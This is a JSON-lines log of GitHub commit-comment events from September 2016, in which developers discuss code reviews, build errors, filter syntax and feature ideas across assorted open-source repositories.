{"id":"4512206990","type":"CommitCommentEvent","actor":{"login":"mapx-"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":18890178,"position":null,"line":null,"path":null,"commit_id":"f6cdb14d2fcf0296851f654733b8b672c5db8973","created_at":"2016-09-03T14:02:44Z","updated_at":"2016-09-03T14:02:44Z","body":"it's working for me using these filters\r\nhttps://adblockplus.org/forum/viewtopic.php?p=157952#p157952"}},"created_at":"2016-09-03T14:02:44Z"}
{"id":"4512207028","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"FireNeslo/blobify"},"payload":{"comment":{"id":18890179,"position":44,"line":36,"path":"index.js","commit_id":"257467cfc3b6088924ed12fe4c80c3855a661e1e","created_at":"2016-09-03T14:02:45Z","updated_at":"2016-09-03T14:02:45Z","body":"I still don't get the use case. I'd rather stick to the simple idea of a browserify transform:\r\n\r\n> Transforms implement a simple streaming interface. […] The transform function fires for every file in the current package and returns a transform stream that performs the conversion. The stream is written to and by browserify with the original file contents and browserify reads from the stream to obtain the new contents.\r\n\r\n– [writing your own transform](https://github.com/substack/browserify-handbook#transforms)"}},"created_at":"2016-09-03T14:02:45Z"}
{"id":"4512208991","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"FireNeslo/blobify"},"payload":{"comment":{"id":18890180,"position":11,"line":9,"path":"index.js","commit_id":"257467cfc3b6088924ed12fe4c80c3855a661e1e","created_at":"2016-09-03T14:04:23Z","updated_at":"2016-09-03T14:04:23Z","body":"This could work nicely:\r\n\r\n```js\r\nif (Array.isArray(opt)) opt = {extensions: opt}\r\nelse opt = Object.assign({extensions: ['.blob']}, opt)\r\n```"}},"created_at":"2016-09-03T14:04:23Z"}
{"id":"4512209233","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18890181,"position":404,"line":4161,"path":"src/game/SpellEffects.cpp","commit_id":"92e53ef31316d9263fe639f9e5116cbecd3ac460","created_at":"2016-09-03T14:04:34Z","updated_at":"2016-09-03T14:04:34Z","body":"Is all of this (line 4161 - 4168 gone? because we need to make sure that guardians are not used out of scope; almost all items summoning guardians (except engineering trinkets) should -not- scale on level; they had a set level."}},"created_at":"2016-09-03T14:04:34Z"}
{"id":"4512209816","type":"CommitCommentEvent","actor":{"login":"leo90skk"},"repo":{"name":"samfreeman05/vscode-database"},"payload":{"comment":{"id":18890182,"position":null,"line":null,"path":null,"commit_id":"7fdeaf80c3f70174138a733110370b668d238b2b","created_at":"2016-09-03T14:05:02Z","updated_at":"2016-09-03T14:05:02Z","body":"can you make a pull request to the origin branch?\r\n\r\nI want to use this feature, but also want to have the current bugfixes - see diff with origin repo."}},"created_at":"2016-09-03T14:05:02Z"}
{"id":"4512211804","type":"CommitCommentEvent","actor":{"login":"FireNeslo"},"repo":{"name":"FireNeslo/blobify"},"payload":{"comment":{"id":18890184,"position":11,"line":9,"path":"index.js","commit_id":"257467cfc3b6088924ed12fe4c80c3855a661e1e","created_at":"2016-09-03T14:06:36Z","updated_at":"2016-09-03T14:06:36Z","body":"True will fix."}},"created_at":"2016-09-03T14:06:36Z"}
{"id":"4512213875","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":18890188,"position":null,"line":null,"path":null,"commit_id":"be08eba204b9757c4d8d8a825be4cbcc4ecf9587","created_at":"2016-09-03T14:08:18Z","updated_at":"2016-09-03T14:08:18Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.244.be08eba204b9757c4d8d8a825be4cbcc4ecf9587](http://build.palaso.org/viewLog.html?buildId=76430&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1496, ignored: 17 Build time: 00:09:45"}},"created_at":"2016-09-03T14:08:18Z"}
{"id":"4512215181","type":"CommitCommentEvent","actor":{"login":"gorhill"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":18890191,"position":null,"line":null,"path":null,"commit_id":"f6cdb14d2fcf0296851f654733b8b672c5db8973","created_at":"2016-09-03T14:09:27Z","updated_at":"2016-09-03T14:09:27Z","body":"Ok. I got curious and I was trying to understand why it wasn't working. Turns out Firefox normalizes `cssText`, so this one worked: icefilms.info##[-abp-properties='z-index: 999999*;']"}},"created_at":"2016-09-03T14:09:27Z"}
{"id":"4512218062","type":"CommitCommentEvent","actor":{"login":"creativefull"},"repo":{"name":"bulentv/js_zklib"},"payload":{"comment":{"id":18890192,"position":null,"line":null,"path":null,"commit_id":"96dde430f4e8afb8c6d960c1e9ef63a0272d1323","created_at":"2016-09-03T14:11:42Z","updated_at":"2016-09-03T14:11:42Z","body":"hi please check your code\r\nhttps://github.com/bulentv/js_zklib/blob/master/zklib/zkattendance.js#L30\r\n\r\nwhen i'm using getAttandance() got error like this\r\n![screenshot_37](https://cloud.githubusercontent.com/assets/13174684/18225374/f59528fa-721a-11e6-8ad0-bc1498fa087e.png)"}},"created_at":"2016-09-03T14:11:42Z"}
{"id":"4512219223","type":"CommitCommentEvent","actor":{"login":"hacker102"},"repo":{"name":"hacker102/DS2"},"payload":{"comment":{"id":18890193,"position":null,"line":null,"path":null,"commit_id":"2ecba585a78d8ae32fee2361ebbbf3a786353bbf","created_at":"2016-09-03T14:12:42Z","updated_at":"2016-09-03T14:12:42Z","body":"shi h chl\r\n"}},"created_at":"2016-09-03T14:12:42Z"}
{"id":"4512219707","type":"CommitCommentEvent","actor":{"login":"l0k1-smirenski"},"repo":{"name":"l0k1-smirenski/steemportal"},"payload":{"comment":{"id":18890194,"position":null,"line":null,"path":null,"commit_id":"e9718d44473c922ff59d0a848f14c7d50980e428","created_at":"2016-09-03T14:13:06Z","updated_at":"2016-09-03T14:13:06Z","body":"The commit adds code that provides each module, core, SPinterface and SPconfig with a local namespace to access the others. This is so that callbacks created by especially the interface but also potentially the configuration backend (such as when configuration changes, this can trigger update hooks on the interface). "}},"created_at":"2016-09-03T14:13:06Z"}
{"id":"4512220260","type":"CommitCommentEvent","actor":{"login":"rubenscholfield"},"repo":{"name":"rubenscholfield/Space-Craft"},"payload":{"comment":{"id":18890195,"position":null,"line":null,"path":null,"commit_id":"74f2901e73f143c609abf5d26a4895927a4657c9","created_at":"2016-09-03T14:13:30Z","updated_at":"2016-09-03T14:13:30Z","body":"Yes, we love it"}},"created_at":"2016-09-03T14:13:30Z"}
{"id":"4512222069","type":"CommitCommentEvent","actor":{"login":"jruesga"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18890196,"position":null,"line":null,"path":null,"commit_id":"c77a9607cd697a988c08c082aff592446545cb62","created_at":"2016-09-03T14:15:00Z","updated_at":"2016-09-03T14:15:00Z","body":"The message list looks nice (i like it). Just the titles are unaligned with the previous (patchset and change) cards (the previous ones have a bit more of justification, which looks better though).\r\n\r\nI don't like the status file icons I added (looks out of place). I think i need another way to express whether the files was added, deleted, ..\r\n"}},"created_at":"2016-09-03T14:15:00Z"}
{"id":"4512222794","type":"CommitCommentEvent","actor":{"login":"dread-uo"},"repo":{"name":"rafamanzo/pcsetup"},"payload":{"comment":{"id":18890198,"position":null,"line":null,"path":null,"commit_id":"f8aeb046a58635be0fe9ffed8b3e833f862f142e","created_at":"2016-09-03T14:15:34Z","updated_at":"2016-09-03T14:15:34Z","body":"In the end of the day, it will still be a single file. It makes sense for your uses, but I prefer something more portable. Shougo's way is interesting; I considered writing something similar so that I could choose which language specific configurations to use, but the single file way is working well enough."}},"created_at":"2016-09-03T14:15:34Z"}
{"id":"4512222880","type":"CommitCommentEvent","actor":{"login":"FireNeslo"},"repo":{"name":"FireNeslo/blobify"},"payload":{"comment":{"id":18890199,"position":44,"line":36,"path":"index.js","commit_id":"257467cfc3b6088924ed12fe4c80c3855a661e1e","created_at":"2016-09-03T14:15:38Z","updated_at":"2016-09-03T14:15:38Z","body":"This was my primary reason for creating this at all.\r\n\r\ni have an incredibly computationally expensive operation and i wanted to externalize it as a blob:\r\n\r\nindex.js\r\n```\r\nconst workerBlob= require('worker.blob.js')\r\nconst worker = new Worker(URL.createObjectURL(workerBlob));\r\n```\r\nworker.js\r\n```\r\nimport algorithm from 'somewhere'\r\n\r\nfunction runAlgorithmALot() {\r\n  ...\r\n}\r\n```\r\nMy main point here is the require and the es6 imports that would otherwise just crash if i tried running this file.\r\nThat requires me to run browserify recurivly there is as far as i know no way around that.\r\n"}},"created_at":"2016-09-03T14:15:38Z"}
{"id":"4512223373","type":"CommitCommentEvent","actor":{"login":"hsluoyz"},"repo":{"name":"ru-faraon/pupy"},"payload":{"comment":{"id":18890200,"position":43,"line":27,"path":"pupy/modules/scapy.py","commit_id":"33f4debf2ed1ccfe019b62d31a6a2c51e56a005c","created_at":"2016-09-03T14:15:58Z","updated_at":"2016-09-03T14:15:58Z","body":"Hi. Npcap has decided to move the DLLs into the Npcap folder. So you would like to use ``C:\\\\WIndows\\\\system32\\\\Npcap\\\\Packet.dll`` instead. Thanks!"}},"created_at":"2016-09-03T14:15:58Z"}
{"id":"4512223638","type":"CommitCommentEvent","actor":{"login":"KristineWolf"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18890201,"position":null,"line":null,"path":null,"commit_id":"e44a4c5fc1e1a34fce43ef1db46fb125ebb6acb8","created_at":"2016-09-03T14:16:12Z","updated_at":"2016-09-03T14:16:12Z","body":"und wenn du ein wnig meher als die hälfte nimmst?\r\n\r\nMit FB verbinden wäre cool aber weißt du wie sowas geht?\r\nWetterbericht denk ich wird schwierig wenn die Veranstaltung erst in einem Monat ist \r\n\r\nich hab mir auch überlegt hinsichtlich location und google maps, dass man die adresse mitangeben muss und dann wird einem quasi die entfernung angegeben und wenn man will auch noch der weg dahin gezeigt "}},"created_at":"2016-09-03T14:16:12Z"}
{"id":"4512224441","type":"CommitCommentEvent","actor":{"login":"D-ECHO"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18890204,"position":null,"line":null,"path":null,"commit_id":"d13e6ddeed75a28c00128d1782106672dd530870","created_at":"2016-09-03T14:16:49Z","updated_at":"2016-09-03T14:16:49Z","body":"Sorry, I can't, my blender fails on importing flightdeck.ac :(\n\n\nAm 03.09.2016 um 09:25 schrieb SM:\n>\n> go for it 😄\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/IAHM-COL/KingAir-350/commit/d13e6ddeed75a28c00128d1782106672dd530870#commitcomment-18889216>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/ALtQ-Fn4h-emO2-RYPaQf985dF1YOC9zks5qmSDQgaJpZM4Jz4s0>.\n>\n\n"}},"created_at":"2016-09-03T14:16:49Z"}
{"id":"4512225222","type":"CommitCommentEvent","actor":{"login":"KristineWolf"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18890205,"position":null,"line":null,"path":null,"commit_id":"f51bd71936184668e14ad33ddaa9715d2e6c0807","created_at":"2016-09-03T14:17:24Z","updated_at":"2016-09-03T14:17:24Z","body":"ja des mit dem events löschen meinst du wenn sie vorbei sind?\r\nwenn ja dann weiß ich schon voran des liegt\r\n"}},"created_at":"2016-09-03T14:17:24Z"}
{"id":"4512225622","type":"CommitCommentEvent","actor":{"login":"jruesga"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18890208,"position":5,"line":77,"path":"app/src/main/res/layout/message_item.xml","commit_id":"ac69a32f85986cd971ac925ac26a2848f54815cc","created_at":"2016-09-03T14:17:43Z","updated_at":"2016-09-03T14:17:43Z","body":"This is too much though (with email and web is enough though). For example in the following message there is nothing interesting to link, but there is plenty of links.\r\n\r\n![screenshot_20160903-161537](https://cloud.githubusercontent.com/assets/1987507/18225435/b7d31d16-71f1-11e6-8ff0-5fb800afa195.png)\r\n"}},"created_at":"2016-09-03T14:17:43Z"}
{"id":"4512225640","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"FireNeslo/blobify"},"payload":{"comment":{"id":18890209,"position":44,"line":36,"path":"index.js","commit_id":"257467cfc3b6088924ed12fe4c80c3855a661e1e","created_at":"2016-09-03T14:17:44Z","updated_at":"2016-09-03T14:17:44Z","body":"> My main point here is the require and the es6 imports that would otherwise just crash if i tried running this file.\r\nThat requires me to run browserify recurivly there is as far as i know no way around that.\r\n\r\nWhy don't you use a transpiling transform and apply it to *just these* files (e.g. `.blob.js`) and then bundle *just these files* using `blobify`. Why do you need recursion?"}},"created_at":"2016-09-03T14:17:44Z"}
{"id":"4512226577","type":"CommitCommentEvent","actor":{"login":"st4ck"},"repo":{"name":"ST-Apps/PoGo-UWP"},"payload":{"comment":{"id":18890210,"position":null,"line":null,"path":null,"commit_id":"1ceaba16022561c7617ad0f58d71004ff10ed5b0","created_at":"2016-09-03T14:18:27Z","updated_at":"2016-09-03T14:18:27Z","body":"Thanks"}},"created_at":"2016-09-03T14:18:27Z"}
{"id":"4512226935","type":"CommitCommentEvent","actor":{"login":"Co0sh"},"repo":{"name":"MWFIAE/BetonQuest-Editor"},"payload":{"comment":{"id":18890212,"position":null,"line":null,"path":null,"commit_id":"225709de971a1ab1966f6c108c89df051c5e3841","created_at":"2016-09-03T14:18:45Z","updated_at":"2016-09-03T14:18:45Z","body":"Ah, I didn't notice that :stuck_out_tongue_closed_eyes: \r\n\r\nYou need to create a separate method, i.e. `click(MouseEvent event)` and call `edit()` if click count in `event` equals 2."}},"created_at":"2016-09-03T14:18:45Z"}
{"id":"4512226998","type":"CommitCommentEvent","actor":{"login":"kevinmichaelchen"},"repo":{"name":"TeslaGov/joan"},"payload":{"comment":{"id":18890213,"position":16,"line":16,"path":"rampart-joan-hook/src/main/java/com/teslagov/joan/rampart/JoanRampartHook.java","commit_id":"237adfb4147508a55bfedb2db44022410d964dc7","created_at":"2016-09-03T14:18:48Z","updated_at":"2016-09-03T14:18:48Z","body":"Sorry I didn't explain the issue well. The problem is that right after we create a resource in Rampart, we cannot force Portal to use Rampart's IDs, since Portal creates its own IDs. This is a problem for a couple reasons, one of them being that when our hook goes to add a user to a role, it is only given Rampart IDs: a personUUID and a roleUUID. Neither of those IDs are sufficient to perform a legal addUserToGroup operation, since what we really need are the \"username\" and \"groupID\" as Portal sees them.\r\n\r\nThe fix would be to create a simple mapping service (call it Noah) that maps Rampart resource IDs to Arc IDs. The flow would then look like this: (1) rampart-joan-hook passes the Rampart IDs to the appropriate endpoint in Noah, (2) Noah makes the appropriate call to Portal with the Joan Java SDK and persists any mappings between Rampart IDs and Portal IDs (e.g., personUUID to username, and roleUUID to groupID)."}},"created_at":"2016-09-03T14:18:48Z"}
{"id":"4512228960","type":"CommitCommentEvent","actor":{"login":"hursey013"},"repo":{"name":"18F/identity-playbook"},"payload":{"comment":{"id":18890214,"position":14,"line":25,"path":"index.html","commit_id":"c258917dd1b3782810c2899c1611df30a356a96c","created_at":"2016-09-03T14:20:20Z","updated_at":"2016-09-03T14:20:20Z","body":"@brendansudol good catch, i guess this is where some automated linters might come in handy."}},"created_at":"2016-09-03T14:20:20Z"}
{"id":"4512229123","type":"CommitCommentEvent","actor":{"login":"ekaitz-zarraga"},"repo":{"name":"ekaitz-zarraga/droWMark"},"payload":{"comment":{"id":18890215,"position":4,"line":16,"path":"plugin/drowmark.vim","commit_id":"43cd9c5471d1b5d5e8cc5ab8058cf9e32d8ff537","created_at":"2016-09-03T14:20:27Z","updated_at":"2016-09-03T14:20:27Z","body":"It is well programmed but WordpressXML-RPC has problems in python3, it is not supported yet"}},"created_at":"2016-09-03T14:20:27Z"}
{"id":"4512229954","type":"CommitCommentEvent","actor":{"login":"Ninn0x4F"},"repo":{"name":"Ninn0x4F/CustomUploaders"},"payload":{"comment":{"id":18890217,"position":null,"line":null,"path":null,"commit_id":"31e4e5b7dc779c468904442a61d9bcaa2e9248bb","created_at":"2016-09-03T14:21:08Z","updated_at":"2016-09-03T14:21:08Z","body":"It's gone."}},"created_at":"2016-09-03T14:21:08Z"}
{"id":"4512230730","type":"CommitCommentEvent","actor":{"login":"jruesga"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18890219,"position":28,"line":70,"path":"app/src/main/java/com/ruesga/rview/widget/DividerItemDecoration.java","commit_id":"5f8031e2e905d33d49667f7854a416824a1139d4","created_at":"2016-09-03T14:21:43Z","updated_at":"2016-09-03T14:21:43Z","body":"Reading this, we problably should check RTL view configuration to swap left and right margins appropriately."}},"created_at":"2016-09-03T14:21:43Z"}
{"id":"4512231678","type":"CommitCommentEvent","actor":{"login":"dpgeorge"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18890220,"position":36,"line":59,"path":"extmod/moduzlib.c","commit_id":"a6864a13c7e82e182e36dab8fb350fb2f7ece766","created_at":"2016-09-03T14:22:30Z","updated_at":"2016-09-03T14:22:30Z","body":"@pfalcon Reading 1 byte at a time seems very inefficient.  If efficiency becomes a concern one could easily add a small (eg 8 byte) buffer in tinflate, and then read_src_stream can be called with (size_t n, uint8_t *buf) arguments."}},"created_at":"2016-09-03T14:22:30Z"}
{"id":"4512232387","type":"CommitCommentEvent","actor":{"login":"FireNeslo"},"repo":{"name":"FireNeslo/blobify"},"payload":{"comment":{"id":18890222,"position":44,"line":36,"path":"index.js","commit_id":"257467cfc3b6088924ed12fe4c80c3855a661e1e","created_at":"2016-09-03T14:23:07Z","updated_at":"2016-09-03T14:23:07Z","body":"For convenience and of course helping with coordination. Its one of the places i know that it will be run in the right order. I don't have to set up several build chains and it makes it easier for people to understand. Of course i can clearly see why its might not be everybody's usecase. So i present this as an alternative approach:\r\n```\r\n  if(options.bundler) {\r\n    return options.bundler.bundle()\r\n      .pipe(through(concat, processBuffer));\r\n  }\r\n  return through(concat, processBuffer);\r\n```\r\n "}},"created_at":"2016-09-03T14:23:07Z"}
{"id":"4512234490","type":"CommitCommentEvent","actor":{"login":"lenertovalucie"},"repo":{"name":"lenertovalucie/projects_learn_python"},"payload":{"comment":{"id":18890225,"position":null,"line":null,"path":null,"commit_id":"488c2da61ffc715528fc3a06de06db2802056ecd","created_at":"2016-09-03T14:24:51Z","updated_at":"2016-09-03T14:24:51Z","body":"add folder numbers"}},"created_at":"2016-09-03T14:24:51Z"}
{"id":"4512234510","type":"CommitCommentEvent","actor":{"login":"piotrek-k"},"repo":{"name":"piotrek-k/generator-dotnetcore-angular2-starterkit"},"payload":{"comment":{"id":18890226,"position":null,"line":null,"path":null,"commit_id":"ee25e1e6f72a4a6607dab96da78f2c85a7d445dc","created_at":"2016-09-03T14:24:53Z","updated_at":"2016-09-03T14:24:53Z","body":"Fixes #1 "}},"created_at":"2016-09-03T14:24:53Z"}
{"id":"4512239170","type":"CommitCommentEvent","actor":{"login":"martinzellner"},"repo":{"name":"gitsimon/tq_website"},"payload":{"comment":{"id":18890230,"position":null,"line":null,"path":null,"commit_id":"d2919bf6212556b9626e2e13db4067a890e986d4","created_at":"2016-09-03T14:28:33Z","updated_at":"2016-09-03T14:28:33Z","body":"Even cleaner code. I like 👍 :)"}},"created_at":"2016-09-03T14:28:33Z"}
{"id":"4512239206","type":"CommitCommentEvent","actor":{"login":"FireNeslo"},"repo":{"name":"FireNeslo/blobify"},"payload":{"comment":{"id":18890231,"position":44,"line":36,"path":"index.js","commit_id":"257467cfc3b6088924ed12fe4c80c3855a661e1e","created_at":"2016-09-03T14:28:35Z","updated_at":"2016-09-03T14:28:35Z","body":"Actuall ill just drop it for now. I want to make tis a bit more solid at any rate."}},"created_at":"2016-09-03T14:28:35Z"}
{"id":"4512240275","type":"CommitCommentEvent","actor":{"login":"primaeval"},"repo":{"name":"primaeval/script.tvguide.fullscreen"},"payload":{"comment":{"id":18890232,"position":null,"line":null,"path":null,"commit_id":"7fba98a727695a5e96f4d856c0122edd367bece0","created_at":"2016-09-03T14:29:29Z","updated_at":"2016-09-03T14:29:29Z","body":"@im85288 @iainsmacleod Here is a new Program List Dialog that is used for the Listings / Now / Next / Search / Reminders / Autoplays views. You might want to apply your colour schemes.\r\n\r\nThere is quite a bit of code functionality that needs to be fully stress tested too. \r\nI am open to suggestions if there is a better way to present the progress or future time information. "}},"created_at":"2016-09-03T14:29:29Z"}
{"id":"4512241681","type":"CommitCommentEvent","actor":{"login":"Stav1472"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18890234,"position":null,"line":null,"path":null,"commit_id":"d794efad94f5589d7ddaba73330e4cf0e0c60118","created_at":"2016-09-03T14:30:31Z","updated_at":"2016-09-03T14:30:31Z","body":"It is in trimmertest250:\r\n\r\n`\r\n  @Test public void issue54_06() {\r\n    trimming(\"a.toString().length()\").to(\"(\\\"\\\" + a).length()\");\r\n  }`"}},"created_at":"2016-09-03T14:30:31Z"}
{"id":"4512241758","type":"CommitCommentEvent","actor":{"login":"FireNeslo"},"repo":{"name":"FireNeslo/blobify"},"payload":{"comment":{"id":18890235,"position":44,"line":36,"path":"index.js","commit_id":"257467cfc3b6088924ed12fe4c80c3855a661e1e","created_at":"2016-09-03T14:30:34Z","updated_at":"2016-09-03T14:30:34Z","body":"Update: i think ill just remove it for now, its not really all that tested, so might want to do some more experimenting."}},"created_at":"2016-09-03T14:30:34Z"}
{"id":"4512242861","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"FireNeslo/blobify"},"payload":{"comment":{"id":18890238,"position":44,"line":36,"path":"index.js","commit_id":"257467cfc3b6088924ed12fe4c80c3855a661e1e","created_at":"2016-09-03T14:31:26Z","updated_at":"2016-09-03T14:31:26Z","body":"> I don't have to set up several build chains and it makes it easier for people to understand.\r\n\r\nI don't think so. It will be unintuitive for people that a transform magically launches another browserify instance by itself. Also, all the options they passed to browserify will not be respected.\r\n\r\n> Of course i can clearly see why its might not be everybody's usecase.\r\n\r\nThat's why I urge you to keep it out of this general-use-case module, as I suggested a simple alternative (that I haven't tried though)."}},"created_at":"2016-09-03T14:31:26Z"}
{"id":"4512245737","type":"CommitCommentEvent","actor":{"login":"st4ck"},"repo":{"name":"ST-Apps/PoGo-UWP"},"payload":{"comment":{"id":18890244,"position":null,"line":null,"path":null,"commit_id":"115988575e6ca3f9d3f7e25e37840877427bc71b","created_at":"2016-09-03T14:33:43Z","updated_at":"2016-09-03T14:33:43Z","body":"I've this bug again after the new pokedex"}},"created_at":"2016-09-03T14:33:43Z"}
{"id":"4512247170","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":18890245,"position":null,"line":null,"path":null,"commit_id":"6a238f0c1a92f02475b02905fe366d9a8fd01ead","created_at":"2016-09-03T14:34:44Z","updated_at":"2016-09-03T14:34:44Z","body":"See #4572"}},"created_at":"2016-09-03T14:34:44Z"}
{"id":"4512248082","type":"CommitCommentEvent","actor":{"login":"cat-0"},"repo":{"name":"linuxmint/mintupdate"},"payload":{"comment":{"id":18890248,"position":null,"line":null,"path":null,"commit_id":"070bf0b91b11936030c2062adc81bc4a94c46eec","created_at":"2016-09-03T14:35:22Z","updated_at":"2016-09-03T14:35:22Z","body":"Hi,\r\nAt lines 124 and 128, you're defining 'prefix' and 'keyword', but you're using instead 'suffix', which isn't defined in that scope (at first sight).\r\nI don't remember getting crashes in mintupdate, but I happened to glance at that file and I don't see how that could work.\r\nI suppose those lines never get called, but I'm have no idea how it should be fixed."}},"created_at":"2016-09-03T14:35:22Z"}
{"id":"4512249137","type":"CommitCommentEvent","actor":{"login":"FireNeslo"},"repo":{"name":"FireNeslo/blobify"},"payload":{"comment":{"id":18890250,"position":44,"line":36,"path":"index.js","commit_id":"257467cfc3b6088924ed12fe4c80c3855a661e1e","created_at":"2016-09-03T14:36:11Z","updated_at":"2016-09-03T14:36:11Z","body":"Update: i think ill just remove it for now, its not really all that tested, so might want to do some more experimenting.\r\n\r\nThank you for the discussion BTW incredibly motivating.\r\n\r\nnb: cheated and moved comment down. Probably breaking some rule but it keeps the flow better."}},"created_at":"2016-09-03T14:36:11Z"}
{"id":"4512249516","type":"CommitCommentEvent","actor":{"login":"Shwetakale"},"repo":{"name":"joshsoftware/website"},"payload":{"comment":{"id":18890253,"position":null,"line":null,"path":null,"commit_id":"26d50514e34624c9f2573c71ba5c4949fa279794","created_at":"2016-09-03T14:36:24Z","updated_at":"2016-09-03T14:36:24Z","body":"#83 Added Vikram's profile"}},"created_at":"2016-09-03T14:36:24Z"}
{"id":"4512250337","type":"CommitCommentEvent","actor":{"login":"Fra298"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18890254,"position":39,"line":407,"path":"win/VC140/game.vcxproj","commit_id":"47273864a3ab69465b07cc43c6b85a3e43d3874c","created_at":"2016-09-03T14:37:03Z","updated_at":"2016-09-03T14:37:03Z","body":"Can't compile because of typo  should be     <ClCompile Include=\"..\\..\\src\\game\\GroupReference.cpp\" />"}},"created_at":"2016-09-03T14:37:03Z"}
{"id":"4512250405","type":"CommitCommentEvent","actor":{"login":"hartkoor"},"repo":{"name":"hartkoor/testrepo"},"payload":{"comment":{"id":18890255,"position":null,"line":null,"path":null,"commit_id":"d772db4221f1e6042ec7f0ccdee0674cec1d71b9","created_at":"2016-09-03T14:37:08Z","updated_at":"2016-09-03T14:37:08Z","body":"Back"}},"created_at":"2016-09-03T14:37:08Z"}
{"id":"4512251610","type":"CommitCommentEvent","actor":{"login":"Muqsit"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18890256,"position":null,"line":null,"path":null,"commit_id":"3d7da60bb0ebe996de5f55a4b308d3c7bedce814","created_at":"2016-09-03T14:38:06Z","updated_at":"2016-09-03T14:38:06Z","body":"mathematics."}},"created_at":"2016-09-03T14:38:06Z"}
{"id":"4512253794","type":"CommitCommentEvent","actor":{"login":"Snake1999"},"repo":{"name":"yescallop/EssentialsNK"},"payload":{"comment":{"id":18890259,"position":null,"line":null,"path":null,"commit_id":"62852c1a0fa283f54701027705dbb730a8c2e747","created_at":"2016-09-03T14:39:47Z","updated_at":"2016-09-03T14:39:47Z","body":"Maybe a separate class for API should be added? The main class `cn.yescallop.essentialsnk.EssentialsNK` might be too crowded to read :)"}},"created_at":"2016-09-03T14:39:47Z"}
{"id":"4512254107","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18890261,"position":null,"line":null,"path":null,"commit_id":"456eacf7fc16a3e8a728c384c95b2bf7feb3adaa","created_at":"2016-09-03T14:40:03Z","updated_at":"2016-09-03T14:40:03Z","body":"Sounds good. "}},"created_at":"2016-09-03T14:40:03Z"}
{"id":"4512254907","type":"CommitCommentEvent","actor":{"login":"ganthore"},"repo":{"name":"gentoo/gentoo"},"payload":{"comment":{"id":18890263,"position":null,"line":null,"path":null,"commit_id":"7e18cbcde5883a589de28e3dbdc3a6528261725b","created_at":"2016-09-03T14:40:37Z","updated_at":"2016-09-03T14:40:37Z","body":"Hmm, after trying to upgrade to this new version on 3 different systems, I'm able to reproduce the following error on all of them during build time:\r\n\r\n```\r\nhdrline.c:97:5: error: expected identifier or ‘(’ before ‘case’\r\n     case 'G':\r\n     ^\r\nMakefile:857: recipe for target 'hdrline.o' failed\r\nmake[2]: *** [hdrline.o] Error 1\r\nmake[2]: *** Waiting for unfinished jobs....\r\nmake[2]: Leaving directory '/var/tmp/portage/mail-client/mutt-1.7.0/work/mutt-1.7.0'\r\nMakefile:887: recipe for target 'all-recursive' failed\r\nmake[1]: *** [all-recursive] Error 1\r\nmake[1]: Leaving directory '/var/tmp/portage/mail-client/mutt-1.7.0/work/mutt-1.7.0'\r\nMakefile:556: recipe for target 'all' failed\r\nmake: *** [all] Error 2\r\n * ERROR: mail-client/mutt-1.7.0::gentoo failed (compile phase):\r\n *   emake failed\r\n * \r\n * If you need support, post the output of `emerge --info '=mail-client/mutt-1.7.0::gentoo'`,\r\n * the complete build log and the output of `emerge -pqv '=mail-client/mutt-1.7.0::gentoo'`.\r\n * The complete build log is located at '/var/tmp/portage/mail-client/mutt-1.7.0/temp/build.log'.\r\n * The ebuild environment file is located at '/var/tmp/portage/mail-client/mutt-1.7.0/temp/environment'.\r\n * Working directory: '/var/tmp/portage/mail-client/mutt-1.7.0/work/mutt-1.7.0'\r\n * S: '/var/tmp/portage/mail-client/mutt-1.7.0/work/mutt-1.7.0'\r\n\r\n```"}},"created_at":"2016-09-03T14:40:37Z"}
{"id":"4512256600","type":"CommitCommentEvent","actor":{"login":"ganthore"},"repo":{"name":"gentoo/gentoo"},"payload":{"comment":{"id":18890265,"position":null,"line":null,"path":null,"commit_id":"7e18cbcde5883a589de28e3dbdc3a6528261725b","created_at":"2016-09-03T14:41:58Z","updated_at":"2016-09-03T14:41:58Z","body":"Confirmed that the software installs OK if I remove ALL the USE flags. Trying to figure out which flag is causing this..."}},"created_at":"2016-09-03T14:41:58Z"}
{"id":"4512258128","type":"CommitCommentEvent","actor":{"login":"i2ft"},"repo":{"name":"i2ft/untitled1"},"payload":{"comment":{"id":18890268,"position":null,"line":null,"path":null,"commit_id":"213b66fa224a4633484b100070be5769ba797b15","created_at":"2016-09-03T14:43:10Z","updated_at":"2016-09-03T14:43:10Z","body":"gfgg"}},"created_at":"2016-09-03T14:43:10Z"}
